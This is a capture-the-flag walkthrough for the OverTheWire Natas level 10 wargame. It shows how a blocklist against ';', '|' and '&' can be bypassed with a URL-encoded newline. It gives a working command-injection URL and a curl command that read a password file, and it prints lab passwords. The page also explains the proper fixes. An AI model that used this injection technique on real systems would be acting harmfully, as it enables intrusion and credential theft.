Skip to main content

Overview

FieldValue
URLhttp://natas10.natas.labs.overthewire.org
Usernamenatas10
Passwordt7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu
Same word-search page as Level 9, but with a filter added. The “View sourcecode” link shows what’s changed.

Hints

The source adds a preg_match check:
if(preg_match('/[;|&]/', $key)) {
    print "Input contains an illegal character!";
}
The characters ;, |, and & are blocked. These were used in the Level 9 solution. Are they the only characters that act as command separators in bash?
In bash, a newline character acts as a command terminator — exactly like ;. The newline character (\n) URL-encoded is %0a. The filter above doesn’t check for it. Try injecting %0a between your grep arguments and a cat command.

Solution

1

Understand what's blocked

The filter catches ;, |, and & in the submitted value. The Level 9 payload (&& cat ...) would be caught.
2

Use newline as a separator

A URL-encoded newline (%0a) is not in the blocklist. Send the payload via the URL directly:
http://natas10.natas.labs.overthewire.org/?needle=key+dictionary.txt+%0a+cat+/etc/natas_webpass/natas11&submit=Search
The shell receives:
grep -i key dictionary.txt
cat /etc/natas_webpass/natas11
3

Read the output

The page renders the grep results followed by the contents of the password file.
Character blacklists are inherently fragile. Newlines, null bytes, and other metacharacters are easy to overlook. The correct fix is to use escapeshellarg() — which safely quotes the entire argument — or to avoid shell execution entirely. Allowlists (only permit alphanumerics) are more robust than blocklists.

With curl

# $'...' is a bash ANSI-C quoted string — it interprets \n as a real newline
# --data-urlencode then percent-encodes it as %0a before sending
curl -s -u natas10:t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu -G \
  --data-urlencode $'needle=key dictionary.txt\ncat /etc/natas_webpass/natas11' \
  --data-urlencode "submit=Search" \
  http://natas10.natas.labs.overthewire.org/

Password

natas11: UJdqkK1pTu6VLt9UHWAgRZz6sVUZ3lEk